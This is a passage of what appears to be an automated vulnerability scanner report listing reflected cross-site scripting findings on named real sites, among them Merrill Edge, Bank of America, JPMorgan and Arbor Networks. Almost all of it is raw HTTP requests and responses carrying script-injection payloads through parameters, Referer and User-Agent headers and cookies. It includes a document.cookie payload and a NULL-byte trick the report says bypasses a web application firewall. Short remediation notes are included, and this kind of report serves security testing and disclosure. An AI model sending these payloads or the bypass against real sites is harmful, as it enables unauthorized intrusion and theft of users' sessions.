<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'BAC1.13948';f91d272c668' ,'Page' : 'self-directed-investing' ,'preview' : false }; //]]> ...[SNIP]...
2.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.merrilledge.com
Path: /m/pages/zero-dollar-trades.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0093556"><script>alert(1)</script>754868bc16e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93556"><script>alert(1)</script>754868bc16e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/zero-dollar-trades.aspx?%0093556"><script>alert(1)</script>754868bc16e=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00ed4ab'%3b713afc694b6 was submitted in the src_cd parameter. This input was echoed as ed4ab';713afc694b6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/zero-dollar-trades.aspx?src_cd=SDMST1%00ed4ab'%3b713afc694b6&cm_sp=BAI-SD-_-DDT-_-BHP-C2f-Service_gwim-024_hi2_direct-v4_arq031i4.gif HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'SDMST1.ed4ab';713afc694b6' ,'Page' : 'zero-dollar-trades' ,'preview' : false }; //]]> ...[SNIP]...
2.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.merrilledge.com
Path: /m/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5a88"><script>alert(1)</script>68ae74c56a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a88"><script>alert(1)</script>68ae74c56a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/home.aspx?%00b5a88"><script>alert(1)</script>68ae74c56a4=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %009bb58'-alert(1)-'f918fae9796 was submitted in the d parameter. This input was echoed as 9bb58'-alert(1)-'f918fae9796 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/ScriptResource.axd?d=aMsfwGC65viXscZammbwz6zVFIwHFO4g83huxlAC0KuLGg8lFje6MewypzmXEh1Q-UpPplE2gpclxViF2RgXdWh4YVn0Q7OU4DI9NURWJHVBNMFF62hTMIOAgq_f-eSgwyY66kBWIgZWwjCsZf_0Klh7YwLof_ssMm6kcCPx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076 HTTP/1.1
Host: www.retirement.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=...[SNIP]...; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:33:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... /ira/scriptresource.axd?d=amsfwgc65vixsczammbwz6zvfiwhfo4g83huxlac0kulgg8lfje6mewypzmxeh1q-uppple2gpclxvif2rgxdwh4yvn0q7ou4di9nurwjhvbnmff62htmioagq_f-esgwyy66kbwigzwwjcszf_0klh7ywlof_ssmm6kccpx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076',"Exception has been thrown by the target of an invocation.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace") ...[SNIP]...
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003fef9'-alert(1)-'ad42e38776 was submitted in the d parameter. This input was echoed as 3fef9'-alert(1)-'ad42e38776 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916 HTTP/1.1
Host: www.retirement.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=...[SNIP]...; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:33:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 3965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <script type='text/javascript' language='javascript'>g_ml_ira_jsLib_1_0.writeErrorMessage('dbe14061-d790-4130-9806-2537a9416f20','/ira/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916',"Invalid character in a Base-64 string.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace");</script> ...[SNIP]...
2.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.retirement.merrilledge.com
Path: /IRA/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009627c"><script>alert(1)</script>ac0806a009c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9627c"><script>alert(1)</script>ac0806a009c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/pages/home.aspx?%009627c"><script>alert(1)</script>ac0806a009c=1 HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <a href="../System/SearchResults.aspx?.9627c"><script>alert(1)</script>ac0806a009c=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')"> ...[SNIP]...
2.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www2.bankofamerica.com
Path: /promos/jump/greatdeals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb0e"%20a%3db%20b8409311022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bb0e" a=b b8409311022 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /promos/jump/greatdeals/?3bb0e"%20a%3db%20b8409311022=1 HTTP/1.1
Host: www2.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 500 Internal Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:30:31 GMT
Content-type: text/html
Set-Cookie: SMIDENTITY=...[SNIP]...; path=/; domain=.bankofamerica.com; secure
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Abnormal
Connection: close
<HTML> <HEAD> <TITLE>An Error Has Occurred</TITLE> </HEAD>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de1ac"><a>d044400ccc3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=de1ac"><a>d044400ccc3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33074
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=KCDJILIAKJFFAMJGBLOJMJFD; secure; path=/
Date: Wed, 02 Feb 2011 22:00:02 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <input type="hidden" name="hdnSourceURL" value="HTTP://WWW.GOOGLE.COM/SEARCH?HL=EN&Q=DE1AC"><A>D044400CCC3"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef54b'-alert(1)-'a8c45daa09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:04:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3685
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Def54b%27%2Dalert%281%29%2D%27a8c45daa09; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=GECPFOICPDDIKDIBPNDLBLKA; path=/
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff9"><script>alert(1)</script>7f3eaf59b2d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /help/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Referer: http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:25 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=131550827; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 49599--><script>alert(1)</script>3f6c8a7be9a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pages/jpmorgan HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a
Connection: close
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT
Date: Wed, 02 Feb 2011 22:19:44 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=c9JYNJYQ7WXh3nVLQdNX56kVHZr1h13x6LR3BV6XVQ8pnhVHjnMl!-1967453422; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <t ...[SNIP]... <!-- userAgentPassed:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a --> ...[SNIP]...
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de9b"><script>alert(1)</script>6af6a5ce680 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8de9b\"><script>alert(1)</script>6af6a5ce680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en8de9b"><script>alert(1)</script>6af6a5ce680; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a91"><script>alert(1)</script>4a8a421a526 was submitted in the mbfcookie[lang] cookie. This input was echoed as 56a91\"><script>alert(1)</script>4a8a421a526 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cleanpipes HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en56a91"><script>alert(1)</script>4a8a421a526; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7177"><script>alert(1)</script>7651ebbe8e8 was submitted in the mbfcookie[lang] cookie. This input was echoed as a7177\"><script>alert(1)</script>7651ebbe8e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cn/865.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena7177"><script>alert(1)</script>7651ebbe8e8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaab4"><script>alert(1)</script>d4517558dd0 was submitted in the mbfcookie[lang] cookie. This input was echoed as eaab4\"><script>alert(1)</script>d4517558dd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cn/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=eneaab4"><script>alert(1)</script>d4517558dd0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce73"><script>alert(1)</script>78e956c9366 was submitted in the mbfcookie[lang] cookie. This input was echoed as bce73\"><script>alert(1)</script>78e956c9366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /contact HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbce73"><script>alert(1)</script>78e956c9366; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a345"><script>alert(1)</script>86899845244 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6a345\"><script>alert(1)</script>86899845244 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /de/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6a345"><script>alert(1)</script>86899845244; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c53b"><script>alert(1)</script>f0a1f66cb8a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c53b\"><script>alert(1)</script>f0a1f66cb8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /de/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
